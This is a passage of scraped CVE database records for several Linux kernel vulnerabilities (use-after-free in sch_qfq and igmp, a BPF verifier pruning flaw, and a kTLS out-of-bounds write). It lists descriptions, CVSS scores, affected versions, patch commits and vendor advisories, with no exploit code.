"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-416",
"description": "CWE-416 Use After Free",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-01-11T19:06:28.103Z",
"orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
"shortName": "Google"
},
"references": [
{
"tags": [
"patch"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=8fc134fee27f2263988ae38920bc03da416b03d8"
},
{
"url": "https://kernel.dance/8fc134fee27f2263988ae38920bc03da416b03d8"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Use-after-free in Linux kernel\u0027s net/sched: sch_qfq component",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
"assignerShortName": "Google",
"cveId": "CVE-2023-4921",
"datePublished": "2023-09-12T19:45:19.367Z",
"dateReserved": "2023-09-12T19:22:10.389Z",
"dateUpdated": "2025-02-13T17:18:36.002Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-6932 (GCVE-0-2023-6932)
Vulnerability from cvelistv5
Published
2023-12-19 14:09
Modified
2025-02-13 17:27
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-416 - Use After Free
Summary
A use-after-free vulnerability in the Linux kernel's ipv4: igmp component can be exploited to achieve local privilege escalation.
A race condition can be exploited to cause a timer be mistakenly registered on a RCU read locked object which is freed by another thread.
We recommend upgrading past commit e2b706c691905fe78468c361aaabc719d0a496f1.
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T08:42:08.680Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"patch",
"x_transferred"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=e2b706c691905fe78468c361aaabc719d0a496f1"
},
{
"tags": [
"x_transferred"
],
"url": "https://kernel.dance/e2b706c691905fe78468c361aaabc719d0a496f1"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00005.html"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/177029/Kernel-Live-Patch-Security-Notice-LSN-0100-1.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"packageName": "kernel",
"product": "Kernel",
"repo": "https://git.kernel.org",
"vendor": "Linux",
"versions": [
{
"lessThan": "6.7",
"status": "affected",
"version": "2.6.12",
"versionType": "custom"
}
]
}
],
"datePublic": "2023-11-24T15:25:56.000Z",
"descriptions": [
{
"lang": "en",
"value": "A use-after-free vulnerability in the Linux kernel\u0027s ipv4: igmp component can be exploited to achieve local privilege escalation.\n\nA race condition can be exploited to cause a timer be mistakenly registered on a RCU read locked object which is freed by another thread.\n\nWe recommend upgrading past commit e2b706c691905fe78468c361aaabc719d0a496f1."
}
],
"impacts": [
{
"capecId": "CAPEC-233",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-233 Privilege Escalation"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-416",
"description": "CWE-416 Use After Free",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-02-08T16:06:01.000Z",
"orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
"shortName": "Google"
},
"references": [
{
"tags": [
"patch"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=e2b706c691905fe78468c361aaabc719d0a496f1"
},
{
"url": "https://kernel.dance/e2b706c691905fe78468c361aaabc719d0a496f1"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00005.html"
},
{
"url": "http://packetstormsecurity.com/files/177029/Kernel-Live-Patch-Security-Notice-LSN-0100-1.html"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Use-after-free in Linux kernel\u0027s ipv4: igmp component",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
"assignerShortName": "Google",
"cveId": "CVE-2023-6932",
"datePublished": "2023-12-19T14:09:15.662Z",
"dateReserved": "2023-12-18T20:14:26.281Z",
"dateUpdated": "2025-02-13T17:27:00.208Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-2163 (GCVE-0-2023-2163)
Vulnerability from cvelistv5
Published
2023-09-20 05:02
Modified
2025-02-27 20:49
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-682 - Incorrect Calculation
Summary
Incorrect verifier pruning in BPF in Linux Kernel >=5.4 leads to unsafe
code paths being incorrectly marked as safe, resulting in arbitrary read/write in
kernel memory, lateral privilege escalation, and container escape.
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux Kernel |
Patch: 0 < 5.4 Version: 0 |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-09T19:05:37.091Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"technical-description"
],
"url": "https://bughunters.google.com/blog/6303226026131456/a-deep-dive-into-cve-2023-2163-how-we-found-and-fixed-an-ebpf-linux-kernel-vulnerability"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=71b547f561247897a0a14f3082730156c0533fed"
}
],
"title": "CVE Program Container",
"x_generator": {
"engine": "ADPogram 0.0.1"
}
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-2163",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-02-26T21:50:53.136131Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-02-27T20:49:30.067Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux Kernel",
"vendor": "Linux",
"versions": [
{
"lessThan": "5.4",
"status": "unaffected",
"version": "0",
"versionType": "custom"
},
{
"lessThan": "71b547f561247897a0a14f3082730156c0533fed",
"status": "affected",
"version": "0",
"versionType": "git"
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eIncorrect verifier pruning\u0026nbsp;\u003c/span\u003ein BPF in Linux Kernel\u0026nbsp;\u0026gt;=5.4\u0026nbsp;\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eleads to unsafe\u003c/span\u003e\u003cbr\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003ecode paths being incorrectly marked as safe, resulting in\u003c/span\u003e\u0026nbsp;arbitrary read/write in\u003cbr\u003ekernel memory, lateral privilege escalation, and container escape.\u003cbr\u003e"
}
],
"value": "Incorrect verifier pruning\u00a0in BPF in Linux Kernel\u00a0\u003e=5.4\u00a0leads to unsafe\ncode paths being incorrectly marked as safe, resulting in\u00a0arbitrary read/write in\nkernel memory, lateral privilege escalation, and container escape."
}
],
"impacts": [
{
"capecId": "CAPEC-233",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-233 Privilege Escalation"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 10,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-682",
"description": "CWE-682 Incorrect Calculation",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-05-21T03:43:35.053Z",
"orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
"shortName": "Google"
},
"references": [
{
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=71b547f561247897a0a14f3082730156c0533fed"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Incorrect Verifier Branch Pruning Logic Leads To Arbitrary Read/Write In Linux Kernel and Lateral Privilege Escalation",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
"assignerShortName": "Google",
"cveId": "CVE-2023-2163",
"datePublished": "2023-09-20T05:02:38.155Z",
"dateReserved": "2023-04-18T18:22:35.441Z",
"dateUpdated": "2025-02-27T20:49:30.067Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-0646 (GCVE-0-2024-0646)
Vulnerability from cvelistv5
Published
2024-01-17 15:16
Modified
2025-10-09 11:52
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-787 - Out-of-bounds Write
Summary
An out-of-bounds memory write flaw was found in the Linux kernel’s Transport Layer Security functionality in how a user calls a function splice with a ktls socket as the destination. This flaw allows a local user to crash or potentially escalate their privileges on the system.
References
| URL | Tags | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
Version: 0 ≤ |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-01T18:11:35.718Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "RHSA-2024:0723",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0723"
},
{
"name": "RHSA-2024:0724",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0724"
},
{
"name": "RHSA-2024:0725",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0725"
},
{
"name": "RHSA-2024:0850",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0850"
},
{
"name": "RHSA-2024:0851",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0851"
},
{
"name": "RHSA-2024:0876",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0876"
},
{
"name": "RHSA-2024:0881",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0881"
},
{
"name": "RHSA-2024:0897",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0897"
},
{
"name": "RHSA-2024:1248",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1248"
},
{
"name": "RHSA-2024:1250",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1250"
},
{
"name": "RHSA-2024:1251",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1251"
},
{
"name": "RHSA-2024:1253",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1253"
},
{
"name": "RHSA-2024:1268",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1268"
},
{
"name": "RHSA-2024:1269",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1269"
},
{
"name": "RHSA-2024:1278",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1278"
},
{
"name": "RHSA-2024:1306",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1306"
},
{
"name": "RHSA-2024:1367",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1367"
},
{
"name": "RHSA-2024:1368",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1368"
},
{
"name": "RHSA-2024:1377",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1377"
},
{
"name": "RHSA-2024:1382",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1382"
},
{
"name": "RHSA-2024:1404",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1404"
},
{
"name": "RHSA-2024:2094",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:2094"
},
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/security/cve/CVE-2024-0646"
},
{
"name": "RHBZ#2253908",
"tags": [
"issue-tracking",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2253908"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c5a595000e267"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-0646",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-10T04:00:15.716357Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-06-17T21:19:19.245Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://git.kernel.org/pub/scm/linux/kernel",
"defaultStatus": "unaffected",
"packageName": "kernel",
"versions": [
{
"lessThan": "6.7-rc5",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:8::realtime",
"cpe:/a:redhat:enterprise_linux:8::nfv"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-513.18.1.rt7.320.el8_9",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:8::baseos"
],
"defaultStatus": "unaffected",
"packageName": "kpatch-patch",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:8::baseos",
"cpe:/a:redhat:enterprise_linux:8::crb"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-513.18.1.el8_9",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_tus:8.2::baseos",
"cpe:/o:redhat:rhel_aus:8.2::baseos",
"cpe:/o:redhat:rhel_e4s:8.2::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.2 Advanced Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-193.128.1.el8_2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_tus:8.2::realtime",
"cpe:/a:redhat:rhel_tus:8.2::nfv"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 8.2 Telecommunications Update Service",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-193.128.1.rt13.179.el8_2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_tus:8.2::baseos",
"cpe:/o:redhat:rhel_aus:8.2::baseos",
"cpe:/o:redhat:rhel_e4s:8.2::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.2 Telecommunications Update Service",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-193.128.1.el8_2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_tus:8.2::baseos",
"cpe:/o:redhat:rhel_aus:8.2::baseos",
"cpe:/o:redhat:rhel_e4s:8.2::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-193.128.1.el8_2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_e4s:8.2::baseos"
],
"defaultStatus": "unaffected",
"packageName": "kpatch-patch",
"product": "Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_tus:8.4::baseos",
"cpe:/o:redhat:rhel_e4s:8.4::baseos",
"cpe:/o:redhat:rhel_aus:8.4::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-305.125.1.el8_4",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_tus:8.4::nfv",
"cpe:/a:redhat:rhel_tus:8.4::realtime"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 8.4 Telecommunications Update Service",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-305.125.1.rt7.201.el8_4",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_tus:8.4::baseos",
"cpe:/o:redhat:rhel_e4s:8.4::baseos",
"cpe:/o:redhat:rhel_aus:8.4::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.4 Telecommunications Update Service",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-305.125.1.el8_4",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_tus:8.4::baseos",
"cpe:/o:redhat:rhel_e4s:8.4::baseos",
"cpe:/o:redhat:rhel_aus:8.4::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-305.125.1.el8_4",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_e4s:8.4::baseos"
],
"defaultStatus": "unaffected",
"packageName": "kpatch-patch",
"product": "Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhev_hypervisor:4.4::el8",
"cpe:/o:redhat:rhel_eus:8.6::baseos",
"cpe:/a:redhat:rhel_eus:8.6::crb"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.6 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-372.91.1.el8_6",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_eus:8.6::baseos"
],
"defaultStatus": "unaffected",
"packageName": "kpatch-patch",
"product": "Red Hat Enterprise Linux 8.6 Extended Update Support",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_eus:8.8::baseos"
],
"defaultStatus": "unaffected",
"packageName": "kpatch-patch",
"product": "Red Hat Enterprise Linux 8.8 Extended Update Support",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_eus:8.8::baseos",
"cpe:/a:redhat:rhel_eus:8.8::crb"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.8 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-477.51.1.el8_8",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:9::appstream",
"cpe:/o:redhat:enterprise_linux:9::baseos",
"cpe:/a:redhat:enterprise_linux:9::realtime",
"cpe:/a:redhat:enterprise_linux:9::crb",
"cpe:/a:redhat:enterprise_linux:9::nfv"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-362.24.1.el9_3",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:9::appstream",
"cpe:/o:redhat:enterprise_linux:9::baseos",
"cpe:/a:redhat:enterprise_linux:9::realtime",
"cpe:/a:redhat:enterprise_linux:9::crb",
"cpe:/a:redhat:enterprise_linux:9::nfv"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-362.24.1.el9_3",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:9::baseos"
],
"defaultStatus": "unaffected",
"packageName": "kpatch-patch",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_eus:9.0::baseos",
"cpe:/a:redhat:rhel_eus:9.0::crb",
"cpe:/a:redhat:rhel_eus:9.0::appstream"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9.0 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-70.93.2.el9_0",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:9.0::nfv",
"cpe:/a:redhat:rhel_eus:9.0::realtime"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 9.0 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-70.93.1.rt21.165.el9_0",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_eus:9.0::baseos"
],
"defaultStatus": "unaffected",
"packageName": "kpatch-patch",
"product": "Red Hat Enterprise Linux 9.0 Extended Update Support",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:9.2::crb",
"cpe:/a:redhat:rhel_eus:9.2::appstream",
"cpe:/o:redhat:rhel_eus:9.2::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9.2 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-284.52.1.el9_2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:9.2::nfv",
"cpe:/a:redhat:rhel_eus:9.2::realtime"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 9.2 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
